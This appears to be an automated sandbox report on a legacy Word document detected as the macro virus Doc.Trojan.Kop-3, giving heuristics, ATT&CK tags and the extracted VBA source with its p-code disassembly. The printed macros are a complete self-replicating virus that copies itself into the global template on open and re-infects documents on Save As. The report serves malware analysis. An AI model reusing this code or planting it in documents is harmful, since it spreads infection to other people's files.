MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a legacy Word document containing VBA macros, specifically an AutoOpen macro that calls the 'kopieren' subroutine. This subroutine appears to copy itself and other macros ('AutoOpen', 'kopieren', 'testmakro') to the global template using WordBasic.MacroCopy. This behavior suggests an attempt to establish persistence or spread the malicious macros. The ClamAV detection 'Doc.Trojan.Kop-3' further supports its malicious nature.
Heuristics 4
-
ClamAV: Doc.Trojan.Kop-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Kop-3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7150 bytes |
SHA-256: cb4d990027b4e509134c2e16e21b55273f0c990982516e5abc314b1635aa574e |
|||
|
Detection
ClamAV:
Doc.Trojan.Kop-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
Public Sub MAIN()
WordBasic.Call "kopieren"
End Sub
Attribute VB_Name = "kopieren"
Public Sub MAIN()
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":testmakro", "Global:DateiSpeichernUnter", 1
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AutoOpen", "Global:AutoOpenDot", 1
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":kopieren", "Global:kopieren", 1
End Sub
Attribute VB_Name = "testmakro"
Public Sub MAIN()
Dim Cnt
Dim Founded
Dim dbox As Object: Set dbox = WordBasic.DialogRecord.FileSaveAs(False) 'define Dialog box
WordBasic.CurValues.FileSaveAs dbox 'initialize and run dialog box
On Error GoTo -1: On Error GoTo Ende 'Call Exception Handle "Exit"
WordBasic.Dialog.FileSaveAs dbox
If ((dbox.Format = 0) Or (dbox.Format = 1)) Then 'Save only Macros in Files with the end *.dot, *.doc
For Cnt = 1 To WordBasic.CountMacros(0) 'Count virulent macros
If WordBasic.[MacroName$](Cnt, 0, 1) = "AutoOpen" Then
Founded = Founded + 1
ElseIf WordBasic.[MacroName$](Cnt, 0, 1) = "kopieren" Then
Founded = Founded + 1
ElseIf WordBasic.[MacroName$](Cnt, 0, 1) = "testmakro" Then
Founded = Founded + 1
End If
Next Cnt
If Founded = 3 Then
WordBasic.MsgBox "Dokument mit den Makros schon infiziert !"
WordBasic.FileSaveAs dbox
Else
WordBasic.MacroCopy "Global:AutoOpenDot", WordBasic.[WindowName$]() + ":AutoOpen", 1
WordBasic.MacroCopy "Global:kopieren", WordBasic.[WindowName$]() + ":kopieren", 1
WordBasic.MacroCopy "Global:DateiSpeichernUnter", WordBasic.[WindowName$]() + ":testmakro", 1
dbox.Format = 1 'transform File in a template
WordBasic.FileSaveAs dbox 'save the File
End If
Ende: 'End Sub if "Exit"
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/b1f867ba626f40588ac253d7c1060afe.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/AutoOpen - 884 bytes
' Line #0:
' Line #1:
' FuncDefn (Public Sub MAIN())
' Line #2:
' LitStr 0x0008 "kopieren"
' Ld WordBasic
' ArgsMemCall Call 0x0001
' Line #3:
' EndSub
' Macros/VBA/kopieren - 1207 bytes
' Line #0:
' Line #1:
' FuncDefn (Public Sub MAIN())
' Line #2:
' Line #3:
' Ld WordBasic
' ArgsMemLd [WindowName$] 0x0000
' LitStr 0x000A ":testmakro"
' Add
' LitStr 0x001A "Global:DateiSpeichernUnter"
' LitDI2 0x0001
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0003
' Line #4:
' Ld WordBasic
' ArgsMemLd [WindowName$] 0x0000
' LitStr 0x0009 ":AutoOpen"
' Add
' LitStr 0x0012 "Global:AutoOpenDot"
' LitDI2 0x0001
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0003
' Line #5:
' Ld WordBasic
' ArgsMemLd [WindowName$] 0x0000
' LitStr 0x0009 ":kopieren"
' Add
' LitStr 0x000F "Global:kopieren"
' LitDI2 0x0001
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0003
' Line #6:
' Line #7:
' EndSub
' Macros/VBA/testmakro - 3130 bytes
' Line #0:
' Line #1:
' FuncDefn (Public Sub MAIN())
' Line #2:
' Dim
' VarDefn Cnt
' Line #3:
' Dim
' VarDefn Founded
' Line #4:
' Dim
' VarDefn dbox (As Object)
' BoS 0x0000
' SetStmt
' LitVarSpecial (False)
' Ld WordBasic
' MemLd DialogRecord
' ArgsMemLd FileSaveAs 0x0001
' Set dbox
' QuoteRem 0x0054 0x0011 "define Dialog box"
' Line #5:
' Ld dbox
' Ld WordBasic
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.